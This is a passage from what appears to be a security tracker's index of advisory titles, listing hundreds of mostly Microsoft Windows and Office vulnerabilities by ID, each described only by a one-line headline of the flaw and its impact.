Corruption Error in VBE6.DLL Lets Remote Users Execute Arbitrary Code [1023974] Microsoft Visual Basic for Applications Memory Corruption Error in VBE6.DLL Lets Remote Users Execute Arbitrary Code [1023973] Windows Mail Integer Overflow in Processing POP3/IMAP Responses Lets Remote Users Execute Arbitrary Code [1023972] Microsoft Outlook Express Integer Overflow in Processing POP3/IMAP Responses Lets Remote Users Execute Arbitrary Code [1023939] Windows SMTP Service Uses Predictable Transaction IDs and Fails to Validate Response IDs Which May Permit DNS Spoofing [1023938] Microsoft Office Visio Buffer Overflow in Processing DXF Files Lets Remote Users Execute Arbitrary Code [1023932] Microsoft Office SharePoint Input Validation Flaw in 'help.aspx' Permits Cross-Site Scripting Attacks [1023913] HP Virtual Machine Manager for Windows Lets Remote Authenticated Users Gain Elevated Privileges [1023857] Windows IPv6 Stack ISATAP Tunnel Validation Flaw Lets Remote Users Spoof IPv4 Addresses [1023856] Microsoft Visio Index Calculation and Attribute Validation Flaws Let Remote Users Execute Code [1023855] Microsoft Exchange May Disclose Message Fragments to Remote Users [1023854] Microsoft Exchange Error in Parsing MX Records Lets Remote Users Deny Service [1023853] Microsoft Office Publisher TextBox Processing Buffer Overflow Lets Remote Users Execute Arbitrary Code [1023851] Windows Media Services Stack Overflow in Processing Transport Information Packets Lets Remote Users Execute Arbitrary Code [1023850] Windows Kernel Flaws Let Local Users Gain Elevated Privileges and Deny Service [1023849] Windows Media Player ActiveX Control Lets Remote Users Execute Arbitrary Code [1023848] Microsoft MPEG Layer-3 Codecs Stack Overflow Lets Remote Users Execute Arbitary Code [1023847] Windows Server Message Block Client Message Processing Bugs Let Remote Users Execute Arbitrary Code [1023846] Windows Authenticode Signature Verification Flaws Let Remote Users Execute Arbitrary Code [1023773] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1023720] Microsoft Virtual PC/Server Lets Local Users Gain Elevated Privileges [1023699] Microsoft Internet Explorer Invalid Pointer Reference Lets Remote Users Execute Arbitrary Code [1023698] Microsoft Office Excel Bugs Let Remote Users Execute Arbitrary Code [1023697] Windows Movie Maker Buffer Overflow Lets Remote Users Cause Arbitrary Code to Be Executed [1023668] Windows VBScript Script Engine Flaw in Processing Windows Help Files Lets Remote Users Execute Arbitrary Code [1023656] Windows API Bug Lets Local Users Deny Service [1023570] Windows Kernel Double Free Memory Error Lets Local Users Gain Elevated Privileges [1023569] Windows Client-Server Run-time Subsystem Process Termination Flaw Lets Local Users Gain Elevated Privileges [1023568] Windows SMB Server Flaws Lets Remote Authenticated Users Execute Arbitrary Code and Let Remote Users Deny Service [1023567] Microsoft Hyper-V Instruction Validation Bug Lets Local Users Deny Service [1023565] Microsoft Office Buffer Overflow in 'MSO.DLL' Lets Remote Users Execute Arbitrary Code [1023564] Microsoft Paint Integer Overflow Lets Remote Users Execute Arbitrary Code [1023563] Microsoft PowerPoint Buffer Overflows and Memory Errors Let Remote Users Execute Arbitrary Code [1023562] Microsoft DirectShow Heap Overflow Lets Remote Users Execute Arbitrary Code [1023561] Windows TCP/IP Stack IPv6 and Header Processing Bugs Let Remote Users Execute Arbitrary Code [1023560] Microsoft Internet Explorer Flaw in Microsoft Data Analyzer ActiveX Control Lets Remote Users Execute Arbitrary Code [1023559] Windows Server Message Block Client Validation and Race Condition Flaws Let Remote Users Execute Arbitrary Code [1023545] OpenSolaris Flaw in kclient and smbadm When Joining a Windows Domain Has Unspecified Impact [1023542] Microsoft Internet Explorer Discloses Known Files to Remote Users [1023494] Microsoft Internet Explorer Cross-Site Scripting Filter Can Be Bypassed [1023493] Microsoft Internet Explorer Multiple Memory Access Flaws Let Remote Users Execute Arbitrary Code [1023471] Windows Kernel #GP Trap Handler Flaw Lets Local Users Gain Elevated Privileges [1023462] Microsoft Internet Explorer Invalid Pointer Reference Lets Remote Users Execute Arbitrary Code [1023435] Adobe Flash 6 on Windows XP Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1023432] Microsoft Embedded OpenType Font Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1023387] Microsoft Internet Information Services (IIS) Filename Extension Parsing Configuration Error May Let Users Bypass Security Controls [1023302] Windows Media Player Indeo Codec Bugs Let Remote Users Execute Arbitrary Code [1023301] Microsoft Internet Explorer Indeo Codec Bugs Let Remote Users Execute Arbitrary Code [1023297] Microsoft Local Security Authority Subsystem Service Validation Flaw Lets Remote Users Deny Service [1023296] Microsoft Active Directory Federation Services Lets Remote Authenticated Users Execute Arbitrary Code and Spoof Web Sites [1023294] Microsoft Office Word and WordPad Text Converter Memory Errors Let Remote Users Execute Arbitrary Code [1023293] Microsoft Internet Explorer Memory Access Flaws Let Remote Users Execute Arbitrary Code [1023292] Microsoft Office Publisher Memory Allocation Validation Flaw Lets Remote Users Execute Arbitrary Code [1023291] Microsoft Internet Authentication Service Bugs Let Remote Authenticated Users Execute Arbitrary Code or Gain Privileges of the Target User [1023233] Microsoft Internet Explorer Discloses Local Path Names When Printing Local HTML Files to PDF Files [1023226] Microsoft Internet Explorer Invalid Pointer Reference in getElementsByTagName() Method Lets Remote Users Execute Arbitrary Code [1023179] Windows Kernel Flaw Lets Remote Users Deny Service [1023158] Microsoft Word Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1023157] Microsoft Excel Bugs Let Remote Users Execute Arbitrary Code [1023156] Microsoft Active Directory Stack Memory Consumption Flaw Lets Remote Users Deny Service [1023155] Windows Kernel 'Win32k.sys' Bugs Let Remote Users Execute Arbitrary Code and Local Users Gain Elevated Privileges [1023154] Microsoft License Logging Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1023153] Microsoft Web Services on Devices API (WSDAPI) Validation Error Lets Remote Users Execute Arbitrary Code [1023146] Tomcat Windows Installer Creates Default Blank Administrative Password [1023126] XScreenSaver May Allow Pop-up Windows to Bypass the Screen Saver When Accessibility is Enabled [1023013] Microsoft Crypto API NULL Character Flaw in Common Name Field and ASN.1 Integer Overflow Lets Remote Users Spoof Certficiates [1023012] Windows Media Player Heap Overflow in Processing ASF Files Lets Remote Users Execute Arbitrary Code [1023011] Microsoft Indexing Service ActiveX Control Lets Remote Users Execute Arbitrary Code [1023010] Microsoft Local Security Authority Subsystem Service (LSASS) Integer Underflow Lets Local Users Deny Service [1023009] Microsoft Silverlight Memory Modification Flaw Lets Remote Users Execute Arbitrary Code [1023008] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code [1023006] Microsoft GDI+ Overflows Let Remote Users Execute Arbitrary Code [1023005] Windows Media Format Runtime Flaws Let Remote Users Execute Arbitrary Code [1023004] Windows Server Message Block Validation Errors Let Remote Users Deny Service and Execute Arbitrary Code [1023003] Windows Kernel Lets Local Users Gain Elevated Privileges or Deny Service [1023002] Microsoft Internet Explorer Flaws Let Remote Users Execute Arbitrary Code [1022848] Windows Server Message Block NEGOTIATE PROTOCOL REQUEST Processing Flaw Lets Remote Users Execute Arbitrary Code [1022846] Microsoft Wireless LAN AutoConfig Service Heap Overflow Lets Remote Wireless Users Execute Arbitrary Code [1022845] Windows TCP/IP Stack Flaws Let Remote Users Execute Arbitrary Code and Deny Service [1022844] Windows Media Format Runtime Bugs in Processing ASF and MP3 Files Let Remote Users Execute Arbitrary Code [1022843] Microsoft DHTML Editing Component ActiveX Control Lets Remote Users Execute Arbitrary Code [1022842] Microsoft JScript Scripting Engine Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1022792] Microsoft Internet Information Server (IIS) FTP Server Buffer Overflows Let Remote Authenticated Users Execute Arbitrary Code and Deny Service [1022716] Microsoft Telnet NTLM Credential Reflection Flaw Lets Remote Users Gain Access [1022715] Microsoft ASP.NET Request Scheduling Flaw Lets Remote Users Deny Service [1022714] Windows Message Queuing Service (MSMQ) NULL Pointer Flaw Lets Local Users Gain Elevated Privileges [1022713] Windows Workstation Service Double Free Memory Error Lets Local Users Gain Elevated Privileges [1022712] Microsoft Active Template Library (ATL) Bugs Let Remote Users Execute Arbitrary Code [1022711] Windows Media File Processing Flaw in Handling AVI Files Lets Remote Users Execute Arbitrary Code [1022709] Windows Remote Desktop Connection Heap Overflows Let Remote Users Execute Arbitrary Code [1022708] Microsoft Office Web Components Buffer Overflows in ActiveX Control Let Remote Users Execute Arbitrary Code [1022630] Windows Kernel win32k.sys Lets Local Users Gain Elevated Privileges [1022611] Microsoft Internet Explorer Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1022610] Microsoft Visual Studio Active Template Library Bugs Let Remote Users Execute Arbitrary Code [1022547] Microsoft Internet Security and Acceleration Server OTP Authentication Bug Lets Remote Users Access Resources [1022546] Microsoft Office Publisher Pointer Dereference Bug Lets Remote Users Execute Arbitrary Code [1022545] Microsoft DirectX DirectShow Validation Bugs Let Remote Users Execute Arbitrary Code [1022544] Microsoft Virtual PC/Server Lets Local Users Gain Elevated Privileges Within a Guest Operating System [1022543] Windows Embedded OpenType (EOT) Font Engine Buffer Overflow Lets Remote Users Execute Arbitrary Code [1022535] Microsoft Office Web Components Bug in Spreadsheet ActiveX Control Lets Remote Users Execute Arbitrary Code [1022514] Microsoft DirectShow Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code [1022369] Microsoft PowerPoint Buffer Overflow in Freelance Translator Lets Remote Users Execute Arbitrary Code [1022359] Windows Kernel Bugs Let Local Users Gain Elevated Privileges [1022358] Microsoft Internet Information Services WebDAV Bug Lets Remote Users Bypass Authentication [1022357] Windows RPC Marshalling Engine Memory Error Lets Local Users Gain Elevated Privileges [1022356] Microsoft Word Buffer Overflows Let Remote USers Execute Arbitrary Code [1022355] Microsoft Office Works Document Converter Bug Lets Remote Users Execute Arbitrary Code [1022354] Microsoft Works Document Converter Bug Lets Remote Users Execute Arbitrary Code [1022353] Windows Search Lets Remote Users Execute Scripting Code to Obtain Information [1022352] Windows Print Spooler Lets Remote Users Execute Arbitrary Code and Local Users Read Arbitrary Files [1022351] Microsoft Excel Bugs Let Remote Users Execute Arbitrary Code [1022350] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1022349] Microsoft Active Directory Bugs Let Remote Users Execute Arbitrary Code or Deny Service [1022299] Microsoft DirectX Bug in DirectShow QuickTime Parser Lets Remote Users Execute Arbitrary Code [1022240] Microsoft Internet Information Server WebDAV Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1022205] Microsoft PowerPoint Has Multiple Buffer Overflows and Memory Corruption Bugs That Let Remote Users Execute Arbitrary Code [1022046] Microsoft ISA Server Input Validation Flaw in 'cookieauth.dll' Permits Cross-Site Scripting Attacks [1022045] Microsoft ISA Server TCP State Error Lets Remote Users Deny Service [1022043] Microsoft WordPad and Office Text Converter Bugs Let Remote Users Execute Arbitrary Code [1022042] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1022041] Windows HTTP Services Bugs Let Remote Users Execute Arbitrary Code [1022040] Microsoft DirectX Bug in Decompressing DirectShow MJPEG Content Lets Remote Users Execute Arbitrary Code [1022039] Microsoft Excel Malformed Object Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1022009] XScreenSaver May Allow Pop-up Windows to Bypass the Screen Lock [1021976] VMware Windows 'vmci.sys' Driver Lets Local Users Gain Elevated Privileges [1021967] Microsoft Office PowerPoint Invalid Object Access Bug Lets Remote Users Execute Arbitrary Code [1021937] Windows Services for UNIX Unspecified Bugs in 'unlzh' and 'unpack' Let Users Execute Arbitrary Code [1021880] Microsoft Internet Explorer Unspecified Bug Lets Remote Users Execute Arbitrary Code [1021831] Microsoft DNS Server Bugs Let Remote Users Spoof the DNS Service [1021830] Microsoft DNS Server Registration Validation Flaw Lets Remote Users Conduct Spoofing Attacks [1021829] Microsoft WINS Server Registration Validation Flaw Lets Remote Users Conduct Spoofing Attacks [1021828] Windows SChannel TLS Handshake Authentication Flaw Lets Certain Remote Users Spoof the System [1021827] Windows Kernel Handle/Pointer Validation Bugs Let Local Users Gain System Privileges [1021826] Windows Kernel Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1021820] IBM Tivoli Storage Manager HSM for Windows Buffer Overflow May Let Remote Users Execute Arbitrary Code [1021744] Microsoft Excel Invalid Object Access Flaw Lets Remote Users Execute Arbitrary Code [1021702] Microsoft Visio Bugs Let Remote Users Execute Arbitrary Code [1021701] Microsoft Exchange MAPI Command Literal Processing Bug Lets Remote Users Deny Service [1021700] Microsoft Exchange Memory Corruption Error in Decoding TNEF Data Lets Remote Users Execute Arbitrary Code [1021699] Microsoft Internet Explorer Bugs in Handling CSS Sheets and Deleted Objects Lets Remote Users Execute Arbitrary Code [1021621] QuickTime Input Validation Flaw in MPEG-2 Playback Component for Windows Lets Remote Users Execute Arbitrary Code [1021560] Windows Server Message Block Buffer Overflow Lets Remote Users Execute Arbitrary Code [1021495] Windows Media Player Integer Overflow in Playing WAV Files Lets Remote Users Deny Service [1021490] Microsoft SQL Server Heap Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1021381] Microsoft Internet Explorer DHTML Data Binding Invalid Pointer Reference Bug Lets Remote Users Execute Arbitrary Code [1021376] Microsoft WordPad Word 97 Text Converter Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1021375] Windows Media Services Discloses Authentication Information to Remote Users [1021374] Windows Media Player Discloses Authentication Information to Remote Users [1021373] Windows Media Player Service Principal Name NTLM Authentication Implementation Lets Remote Users Execute Arbitrary Code [1021372] Windows Media Services Service Principal Name NTLM Authentication Implementation Lets Remote Users Execute Arbitrary Code [1021371] Microsoft Internet Explorer HTML Processing Bugs Let Remote Users Execute Arbitrary Code [1021370] Microsoft Word Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1021368] Microsoft Excel Formula, Object, and Global Array Bugs Let Remote Users Execute Arbitrary Code [1021367] Microsoft Office SharePoint Server Access Control Flaw Lets Remote Users Gain Administrative Access [1021366] Windows Search Bugs Let Remote Users Execute Arbitrary Code [1021365] Microsoft GDI Buffer Overflows in Processing WMF Files Lets Remote Users Execute Arbitrary Code [1021363] Microsoft SQL Server Memory Overwrite Bug in sp_replwritetovarbin May Let Remote Users Execute Arbitrary Code [1021294] Microsoft Office Communicator VoIP Processing Bugs Let Remote Users Deny Service [1021245] Windows Vista Buffer Overflow in CreateIpForwardEntry2() May Let Local Users Gain Elevated Privileges [1021190] Mozilla Firefox '.url' Windows Shortcut Files May Let Remote Users Obtain Potentially Sensitive Information [1021164] Microsoft XML Core Services (MSXML) Bugs Let Remote Users Obtain Information and Execute Arbitrary Code [1021163] Windows Server Message Block NTLM Authentication Replay Bug Lets Remote Users Execute Arbitrary Code [1021091] Windows Server Service RPC Processing Bug Lets Remote Users Execute Arbitrary Code [1021090] Cisco PIX Firewall Windows NT Domain Authentication Bug Lets Remote Users Bypass IPSec/SSL VPN Authentication [1021089] Cisco ASA Windows NT Domain Authentication Bug Lets Remote Users Bypass IPSec/SSL VPN Authentication [1021053] Microsoft Ancillary Function Driver 'afd.sys' Lets Local Users Gain Elevated Privileges [1021052] Microsoft Message Queuing (MSMQ) Heap Overflow Lets Remote Users Execute Arbitrary Code [1021051] Windows Kernel Virtual Address Descriptor Integer Overflow Lets Local Users Gain Elevated Privileges [1021049] Windows Server Message Block Buffer Underflow Lets Remote Authenticated Users Execute Arbitrary Code [1021047] Microsoft Internet Explorer Flaws Permit Cross-Domain Scripting Attacks and Let Remote Users Execute Arbitrary Code [1021046] Windows Kernel Bugs Let Local Users Gain Elevated Privileges [1021045] Microsoft Office CDO Protocol Bug Lets Remote Users Execute Arbitrary Scripting Code [1021044] Microsoft Excel Object, Calendar, and Formula Bugs Let Remote Users Execute Arbitrary Code [1021043] Microsoft Host Integration Server RPC Buffer Overflow Lets Remote Users Execute Arbitrary Code [1021042] Microsoft Active Directory LDAP Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1021020] Cisco Unity Bug in Microsoft API Lets Remote Users Deny Service [1021018] Microsoft Digital Image 'PipPPush.DLL' ActiveX Control Lets Remote Users Access Files [1020901] BIND Windows UDP Client Handler Bug Lets Remote Users Deny Service [1020887] Windows SMB Processing Bug Lets Remote Users Deny Service [1020845] Apple Bonjour for Windows mDNSResponder Null Pointer Dereference Lets Users Deny Service [1020844] Apple Bonjour for Windows DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020839] iTunes Windows Driver Integer Overflow Lets Local Users Gain Elevated Privileges [1020838] Microsoft GDI+ Integer Overflow in Processing BMP Files Lets Remote Users Execute Arbitrary Code [1020837] Microsoft GDI+ Buffer Overflow in Processing WMF Files Lets Remote Users Execute Arbitrary Code [1020836] Microsoft GDI+ Bug in Processing GIF Image Files Lets Remote Users Execute Arbitrary Code [1020835] Microsoft GDI+ Memory Corruption Error in Processing EMF Image Files Lets Remote Users Execute Arbitrary Code [1020834] Microsoft GDI+ Heap Overflow in Processing Gradient Sizes Lets Remote Users Execute Arbitrary Code [1020833] Microsoft Office OneNote Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020832] Windows Media Encoder Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020831] Windows Media Player Bug in Playing Audio Files via Server-side Playlists Lets Remote Users Execute Arbitrary Code [1020733] Windows Media Services ActiveX Control Buffer Overflow in CallHTMLHelp() Function Lets Remote Users Execute Arbitrary Code [1020711] Windows nslookup Bug May Let Remote Users Execute Arbitrary Code [1020699] VERITAS Storage Foundation for Windows Accepts NULL NTLMSSP Authentication [1020681] Windows Messenger ActiveX Control Bug Lets Remote Users Obtain Information and Perform Chat Functions [1020680] Windows Mail MTHML Redirect Bug Lets Remote Users Obtain Information [1020679] Microsoft Outlook Express MTHML Redirect Bug Lets Remote Users Obtain Information [1020676] Microsoft PowerPoint Memory Errors Let Remote Users Execute Arbitrary Code [1020675] Microsoft Color Management Module Heap Overflow Lets Remote Users Execute Arbitrary Code [1020674] Microsoft Internet Explorer Multiple Bugs Let Remote Users Execute Arbitrary Code [1020673] Microsoft Office Format Filter Bugs Let Remote Users Execute Arbitrary Code [1020672] Microsoft Excel Input Validation Bug in Parsing Records Lets Remote Users Execute Arbitrary Code [1020671] Microsoft Excel Input Validation Bug in Processing Array Index Values Lets Remote Users Execute Arbitrary Code [1020670] Microsoft Excel Input Validation Bug in Processing Index Values Lets Remote Users Execute Arbitrary Code [1020669] Microsoft Excel Credential Caching Bug Lets Local Users Gain Access to Remote Data Sources [1020607] Mac OS X Quick Look Buffer Overflow in Downloading Microsoft Office Files Lets Remote Users Execute Arbitrary Code [1020447] Microsoft Word Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1020441] Microsoft SQL Server Bugs Let Remote Authenticated Users Obtain Information and Execute Arbitrary Code [1020439] Microsoft Outlook Web Access for Exchange Server Input Validation Bugs Permit Cross-Site Scripting Attacks [1020437] Windows DNS Service Bugs Let Remote Users Spoof the System [1020436] Windows Explorer Bug in Parsing Saved Search Files Lets Remote Users Execute Arbitrary Code [1020433] Microsoft Access Snapshot Viewer ActiveX Control Lets Remote Users Download Files to Arbitrary Locations [1020382] Microsoft Internet Explorer Lets Remote Users Conduct Cross-Domain Scripting Attacks [1020330] Safari for Windows WebKit JavaScript Array Memory Corrpution Bug Lets Remote Users Execute Arbitrary Code [1020329] Safari for Windows Bug with IE Trusted Zone Sites Lets Remote Users Execute Arbitrary Code [1020232] Microsoft Speech API Lets Remote Users Execute Arbitrary Commands [1020231] Windows Bug in Processing Pragmatic General Multicast Packets with an Invalid Fragment Option Lets Remote Users Deny Service [1020230] Windows Bug in Processing Pragmatic General Multicast Packets with an Invalid Option Length Lets Remote Users Deny Service [1020229] Microsoft Active Directory LDAP Validation Bug Lets Remote Users Deny Service [1020228] Microsoft WINS Data Structure Validation Bug Lets Local Users Gain Elevated Privileges [1020226] Microsoft Internet Explorer HTTP Request Header Bug May Let Remote Users Obtain Information in a Different Domain [1020225] Microsoft Internet Explorer Bug in Processing Method Calls Lets Remote Users Execute Arbitrary Code [1020223] Microsoft DirectX SAMI File Validation Bug Lets Remote Users Execute Arbitrary Code [1020222] Microsoft DirectX MJPEG Stream Error Handling Bug Lets Remote Users Execute Arbitrary Code [1020221] Windows Bluetooth Stack SDP Processing Bug Lets Remote Users Execute Arbitrary Code [1020197] VMware Tools Input Validation Flaw in Windows Guest OS Lets Local Users Gain Elevated Privileges [1020150] Apple Safari for Windows XP and Vista Lets Remote Users Download Files [1020016] Microsoft Malware Protection Engine Lets Remote Users Deny Service [1020015] Microsoft Publisher Bug in Processing Object Header Data Lets Remote Users Execute Arbitrary Code [1020014] Microsoft Word Memory Error in Processing CSS Values Lets Remote Users Execute Arbitrary Code [1020013] Microsoft Word Memory Error in Processing RTF Files Lets Remote Users Execute Arbitrary Code [1020007] Windows CE GDI+ and GIF Processing Bug Lets Remote Users Execute Arbitrary Code [1019904] Windows Kernel Bug Lets Local Users Gain LocalSystem Privileges [1019804] Microsoft Visio Lets Remote Users Execute Arbitrary Code [1019803] Windows Kernel Lets Local Users Gain Kernel Level Privileges [1019802] Windows DNS Client Lets Remote Users Spoof the System [1019801] Microsoft Internet Explorer Data Stream Processing Bug Lets Remote Users Execute Arbitrary Code [1019800] Microsoft Internet Explorer 'hxvz.dll' ActiveX Control Lets Remote Users Execute Arbitrary Code [1019799] Windows VBScript and JScript Scripting Engine Bug Lets Remote Users Execute Arbitrary Code [1019798] Microsoft GDI Buffer Overflow in Processing EMF and WMF Files Lets Remote Users Execute Arbitrary Code [1019797] Microsoft Project Memory Error Lets Remote Users Execute Arbitrary Code [1019738] Microsoft Office S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019737] Windows Live Mail S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019736] Microsoft Outlook S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019686] Microsoft Jet Database Buffer Overflow in 'msjet40.dll' Lets Remote Users Execute Arbitrary Code via Word Documents [1019621] VMware Windows Hosted Systems Named Pipe Bugs Let Local Users Gain Elevated Privileges [1019616] GroupWise Windows Client API Bug Lets Remote Authenticated Users Access E-mail [1019605] Citrix Presentation Server Client for Windows May Disclose Credentials to Local Users [1019587] Microsoft Excel Input Validation Bug in Processing Conditional Formatting Values Lets Remote Users Execute Arbitrary Code [1019586] Microsoft Excel Input Validation Bug in Processing Rich Text Data Lets Remote Users Execute Arbitrary Code [1019585] Microsoft Excel Formula Parsing Error Lets Remote Users Execute Arbitrary Code [1019584] Microsoft Excel Input Validation Bug in Processing Style Record Data Lets Remote Users Execute Arbitrary Code [1019583] Microsoft Excel Flaw in Importing '.slk' Files Lets Remote Users Execute Arbitrary Code [1019582] Microsoft Excel Input Validation Bug in Processing Data Validation Records Lets Remote Users Execute Arbitrary Code [1019581] Microsoft Office Web Components DataSource Bug Lets Remote Users Execute Arbitrary Code [1019580] Microsoft Office Web Components URL Parsing Bug Lets Remote Users Execute Arbitrary Code [1019579] Microsoft Outlook 'mailto:' URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1019578] Microsoft Office and Excel Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1019525] Symantec Backup Exec for Windows Server ActiveX Control Unsafe Methods Let Remote Users Execute Arbitrary Code [1019524] Symantec Backup Exec for Windows Server ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019388] Microsoft Works/Microsoft Office Bug in Processing '.wps' Field Length Values Lets Remote Users Execute Arbitrary Code [1019387] Microsoft Works/Microsoft Office Bug in Processing '.wps' Header Index Table Lets Remote Users Execute Arbitrary Code [1019386] Microsoft Works/Microsoft Office Bug in Processing '.wps' File Section Length Headers Lets Remote Users Execute Arbitrary Code [1019385] Microsoft Internet Information Services Error in Processing ASP Page Input Lets Remote Users Execute Arbitrary Code [1019384] Microsoft Internet Information Services File Change Notification Bug Lets Local Users Gain Elevated Privileges [1019383] Windows Vista TCP/IP Stack DHCP Response Processing Bug Lets Remote Users Deny Service [1019381] Microsoft Internet Explorer Argument Validation Flaw in 'dxtmsft.dll' Lets Remote Users Execute Arbitrary Code [1019380] Microsoft Internet Explorer Property Method Processing Bug Lets Remote Users Execute Arbitrary Code [1019379] Microsoft Internet Explorer HTML Layout Rendering Bug Lets Remote Users Execute Arbitrary Code [1019378] Microsoft Internet Explorer Buffer Overflow in Fox Pro ActiveX Control Lets Remote Users Execute Arbitrary Code [1019377] Microsoft Office Publisher Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1019376] Microsoft Office Publisher Invalid Memory Reference Bug Lets Remote Users Execute Arbitrary Code [1019375] Microsoft Office Object Processing Flaw Lets Remote Users Execute Arbitrary Code [1019374] Microsoft Word Memory Error Lets Remote Users Execute Arbitrary Code [1019373] Windows Heap Overflow in Object Linking and Embedding (OLE) Automation Lets Remote Users Execute Arbitrary Code [1019372] Windows WebDAV Mini-Redirector Response Handling Bug Lets Remote Users Execute Arbitrary Code [1019258] Microsoft Visual Basic '.dsr' File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019200] Microsoft Excel File Header Bug Lets Remote Users Execute Arbitrary Code [1019166] Windows TCP/IP Stack ICMP and IGMP Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1019078] Microsoft Internet Explorer Object Access Bugs Let Remote Users Execute Arbitrary Code [1019077] Microsoft Message Queuing (MSMQ) Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019075] Windows Vista Kernel ALPC Validation Flaw Lets Local Users Gain Elevated Privileges [1019074] Windows Media Format Runtime ASF File Parsing Bug Lets Remote Users Execute Arbitrary Code [1019073] Microsoft DirectX Bugs in Parsing SAMI, WAV, and AVI Files Let Remote Users Execute Arbitrary Code [1019072] Windows Vista Server Message Block v2 Signature Flaw Lets Remote Users Execute Arbitrary Code [1019064] Windows Media Player Stack Overflow in 3ivx Codec Lets Remote Users Execute Arbitrary Code [1019046] Cisco Security Agent for Windows Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019033] Microsoft Web Proxy Auto-Discovery Name Server Resolution Bug Lets Remote Users Conduct Man-in-the-Middle Attacks [1019001] Symantec Backup Exec for Windows Servers Lets Remote Users Deny Service [1018976] Microsoft Jet Engine Stack Overflow May Let Remote Users Execute Arbitrary Code [1018903] Microsoft DebugView 'Dbgv.sys' Module Lets Local Users Gain Kernel Level Privileges [1018833] Windows Macromedia Security Driver Buffer Overflow Lets Local Users Gain Elevated Privileges [1018832] Windows Mobile SMS Handler Bug Lets Remote Users Obfuscate SMS Message Source Addresses [1018790] Microsoft Word Bug in Processing Office Files Lets Remote Users Execute Arbitrary Code [1018789] Microsoft SharePoint Input Validation Hole Permits Cross-Site Scripting Attacks [1018788] Microsoft Internet Explorer Bugs Let Remote Users Spoof the Address Bar and Execute Arbitrary Code [1018787] Windows RPC NTLMSSP Authentication Flaw Lets Remote Users Deny Service [1018786] Microsoft Outlook Express Bug in Processing NNTP Responses Lets Remote Users Execute Arbitrary Code [1018785] Windows Mail Bug in Parsing NNTP Responses Lets Remote Users Execute Arbitrary Code [1018727] Microsoft Internet Security and Acceleration Server SOCKS4 Proxy Discloses IP Address Information to Remote Users [1018678] Windows Services for UNIX Lets Local Users Gain Elevated Privileges [1018677] Microsoft Agent ActiveX Control Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018676] Microsoft Visual Basic VBP File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018617] Subversion Windows Client Input Validation Flaw in filename Parameter Lets Remote Authenticated Users Create/Overwrite Files [1018575] Safari for Windows Lets Remote Users Upload Arbitrary File [1018568] Microsoft Vector Markup Language Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018567] Microsoft Virtual PC/Server Heap Overflow Lets Local Users Gain Elevated Privileges [1018566] Windows Bugs in the Contacts, Feed Headlines, and Weather Gadgets Let Remote Users Execute Arbitrary Code [1018565] Windows Media Player Skin File Header Processing Bugs Let Remote Users Execute Arbitrary Code [1018563] Microsoft GDI Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018562] Microsoft Internet Explorer CSS and ActiveX Control Bugs Let Remote Users Execute Arbitrary Code [1018561] Microsoft Excel Workspace Index Validation Bug Lets Remote Users Execute Arbitrary Code [1018560] Microsoft OLE Automation Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1018559] Microsoft Core XML Services Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018551] Microsoft DirectX Buffer Overflow in FlashPix ActiveX Control Lets Remote Users Execute Arbitrary Code [1018520] Microsoft Visual Database Tools Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code [1018420] Microsoft DirectX Heap Overflow in Processing RLE-Compressed Targa Images Lets Remote Users Execute Arbitrary Code [1018412] Mozilla Firefox Lets Remote Users Inject Arbitrary Content into 'about:blank' Windows [1018366] Symantec Backup Exec for Windows RPC Bug Lets Remote Users Deny Service [1018355] Windows Active Directory Bug in Processing LDAP Convertible Attributes Lets Remote Users Execute Arbitrary Code [1018354] Windows Vista Firewall Teredo Interface Discloses Network Information to Remote Users and May Let Remote Users Bypass Firewall Rules [1018353] Microsoft Office Publisher Lets Remote Users Execute Arbitrary Code [1018352] Microsoft Excel Caculation Error and Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1018351] Microsoft Internet Explorer Bug in Firefox URL Protocol Handler Lets Remote Users Execute Arbitrary Commands [1018321] Microsoft Excel Sheet Name Buffer Overflow Lets Remote Users Execute Arbitrary Code [1018318] Nessus Input Validation Hole in Windows GUI Permits Cross-Site Scripting Attacks [1018251] Microsoft Office Buffer Overflow in MSODataSourceControl ActiveX Control May Let Remote Users Execute Arbitrary Code [1018235] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1018234] Windows Mail MHTML Protocol Handler Content-Disposition Bug Lets Remote Users Obtain Information [1018232] Windows Mail MHTML Protocol Handler Redirect Bug Lets Remote Users Obtain Information [1018230] Windows Input Validation Flaw in Win32 API 